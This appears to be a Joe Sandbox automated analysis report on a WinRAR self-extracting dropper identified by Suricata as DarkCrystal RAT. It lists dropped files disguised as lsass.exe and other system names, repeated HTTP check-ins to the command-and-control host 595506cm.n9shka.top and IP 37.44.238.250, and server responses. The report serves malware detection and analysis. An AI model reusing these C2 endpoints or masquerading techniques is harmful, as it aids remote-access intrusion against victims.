Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\CmKYhHkf.log	Joe Sandbox ML: detected
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Joe Sandbox ML: detected
Source: C:\HypercontainerServerhostDll\TextInputHost.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\HInMzsNO.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\AFUvvHdz.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\JeCeCscc.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\GQmWAABO.log	Joe Sandbox ML: detected
Source: C:\Recovery\lsass.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\EaXPTOzT.log	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Qsi7IgkrWa.exe

Joe Sandbox ML: detected

Source: Qsi7IgkrWa.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Directory created: C:\Program Files\Windows Portable Devices\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Directory created: C:\Program Files\Windows Portable Devices\6e82e733a89f1e	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Directory created: C:\Program Files\Microsoft Office 15\ClientX64\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Directory created: C:\Program Files\Microsoft Office 15\ClientX64\6e82e733a89f1e	Jump to behavior

Source: Qsi7IgkrWa.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Qsi7IgkrWa.exe

Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BBA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		0_2_00BBA69B
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BCC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		0_2_00BCC220

Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49738 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49762 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49739 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49737 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49801 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49844 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49872 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49781 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49734 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49823 -> 37.44.238.250:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: Joe Sandbox View

IP Address: 37.44.238.250 37.44.238.250

Source: Joe Sandbox View

ASN Name: HARMONYHOSTING-ASFR HARMONYHOSTING-ASFR

Source: global traffic	HTTP traffic detected: POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 595506cm.n9shka.topContent-Length: 336Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 595506cm.n9shka.topContent-Length: 336Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 595506cm.n9shka.topContent-Length: 328Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 595506cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 595506cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 595506cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 595506cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 595506cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 595506cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 595506cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: 595506cm.n9shka.top

Source: unknown

HTTP traffic detected: POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 595506cm.n9shka.topContent-Length: 336Expect: 100-continueConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 00:42:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 00:42:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 00:42:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 00:42:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 00:43:05 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 00:43:14 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 00:43:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 00:43:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 00:43:40 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 00:43:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: lsass.exe, 0000000A.00000002.1889556610.0000000002B36000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.1889556610.0000000002D07000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000011.00000002.2025489477.00000000037F4000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000011.00000002.2025489477.0000000003623000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2110806554.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2110806554.0000000002E24000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.2251019858.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.2251019858.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000020.00000002.2378415745.0000000002DAD000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000020.00000002.2378415745.0000000002F7E000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2463680007.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2463680007.0000000002A1A000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2555484716.000000000325D000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2555484716.000000000342E000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000030.00000002.2640928186.0000000002C1D000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000030.00000002.2640928186.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2728259832.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2728259832.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000003A.00000002.2859804094.0000000003810000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000003A.00000002.2859804094.00000000039E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://595506cm.n9shka.top
Source: lsass.exe, 0000003A.00000002.2859804094.0000000003810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://595506cm.n9shka.top/
Source: lsass.exe, 0000000A.00000002.1889556610.0000000002B36000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000011.00000002.2025489477.0000000003623000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2110806554.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.2251019858.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000020.00000002.2378415745.0000000002DAD000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2463680007.0000000002A1A000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2555484716.000000000325D000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000030.00000002.2640928186.0000000002C1D000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2728259832.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000003A.00000002.2859804094.0000000003810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://595506cm.n9shka.top/BigloadgeneratortraffictestDatalifeTemp.php
Source: lsass.exe, 00000025.00000002.2463680007.0000000002A1A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://595506cm.n9shka.topP
Source: ComponentBrowserruntimeHostNet.exe, 00000004.00000002.1759739963.000000000388F000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.1889556610.0000000002B36000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000011.00000002.2025489477.0000000003623000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2110806554.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.2251019858.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000020.00000002.2378415745.0000000002DAD000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2463680007.0000000002A1A000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2555484716.000000000325D000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000030.00000002.2640928186.0000000002C1D000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2728259832.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000003A.00000002.2859804094.0000000003810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe

